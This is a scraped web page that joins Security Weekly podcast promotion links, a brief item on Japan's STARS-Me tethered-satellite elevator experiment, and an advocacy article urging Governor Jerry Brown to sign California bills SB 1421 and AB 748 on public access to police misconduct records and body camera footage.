Full Show Notes: https://wiki.securityweekly.com/BSWEpisode100
Visit https://www.securityweekly.com/bsw for all the latest episodes!
Visit https://www.activecountermeasures/bsw to sign up for a demo or buy our AI Hunter!!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
STARS-Me (or Space Tethered Autonomous Robotic Satellite – Mini elevator), built by engineers at Shizuoka University in Japan, is comprised of two 10-centimeter cubic satellites connected by a 10-meter-long tether. A small robot representing an elevator car, about 3 centimeters across and 6 centimeters tall, will move up and down the cable using a motor as the experiment floats in space.
In November 2014, James De La Rosa was shot and killed by Bakersfield police officers. He was unarmed and 22 years old. Following his death, his family desperately wanted answers. But in California, police misconduct records are generally not available to the public—limiting what the De La Rosa family was able to learn about the officers who killed James.
“One of the officers who was involved in James’s shooting has reportedly also been involved in seven other shootings, while another officer has reportedly been involved in another killing,” James De La Rosa’s mother Leticia said in a statement to the ACLU. “Yet state law shields their records and families like mine rarely get answers to the questions we ask. All we get is secrecy.”
Like Leticia De La Rosa, Theresa Smith had a son killed by California police officers. Caesar Cruz was shot in a Walmart parking lot—allegedly multiple times—by Anaheim police officers before dying in a hospital a half hour later. An attorney for Cruz’ family called his death a “police execution.”
But all that Cruz’ family was allowed to know about her son’s death was that five officers were involved, and it took Smith over a year and a half to determine the name of the officer who killed Caesar Cruz.
While police misconduct information is public record in many states, that’s not the case in California. Even when an officer is repeatedly accused of or disciplined for abuse, these records are considered part of an officer’s personnel file.
In the 1970s, Gov. Jerry Brown signed into law a measure that blocked public access to misconduct documents, and forced defendants to petition a judge to examine these records in private and decide if the information warranted disclosure. In 2006, the California Supreme Court ruled that police misconduct investigations are confidential, a ruling that has kept answers from families of people hurt by police violence, obscured critical information about public officials from journalists, and shielded police from scrutiny.
Leticia De La Rosa and Theresa Smith are both advocates for a California bill that could make police investigation and disciplinary records available to the public in particularly egregious instances of misconduct.
“This bill would require, notwithstanding any other law, certain peace officer or custodial officer personnel records and records relating to specified incidents, complaints, and investigations involving peace officers and custodial officers to be made available for public inspection pursuant to the California Public Records Act,” reads California State Senate Bill 1421.
If SB 1421, sponsored by Sen. Nancy Skinner (D-Berkeley), becomes law, personnel records could be released to the public. Journalists would be able to more easily access information, like when officers shoot, kill, commit perjury, sexually assault, lie in an investigation, or seriously injure a citizen.
Some police labor unions have fought the bill fiercely. The California Sheriffs Association argued that the bill could jeopardize officer privacy and create a financial burden on local agencies. Los Angeles Times journalist Liam Dillon noted that the Los Angeles Police Protective League gave the maximum contribution allowable to a dozen Assembly Democrats as they considered the bill.
Despite opposition from police unions, Nikki Moore, legal counsel and legislative at California News Publishers Association, noted that the California Police Chiefs Association came on in support of the bill. “When they fire an officer and have evidence of misconduct, they can’t tell the public. They saw value in this transparency, and it’s a new perspective.”
SB 1421 has made it to the governor’s desk. It isn’t the only bill awaiting Jerry Brown’s signature that could improve access to police records. Assembly Bill 748 would require police departments to make body camera footage of most officer shootings and serious uses of force publicly available.
In a blog post, California Public Records Act attorney Anna von Herrmann wrote that the bill would open up critical access to records about egregious officer misconduct. “Given the enormous power that law enforcement agencies wield, from the power to arrest and detain individuals to the power to use lethal force, public access to this information could be a powerful tool to understanding and challenging law enforcement abuses.”
The impacts of both bills for transparency could be huge—for families like Cruz’ and De La Rosa’s, community organizers, and journalists reporting on police violence and abuse of power.
“Access to government records is a fundamental principle of democracy,” said Moore. “California, for so long, has denied access to these records, retaining complete discretion over disclosure. You have government agencies acting as editor.”
SB 1421 and AB 748 both await Governor Jerry Brown’s signature. He should sign them both.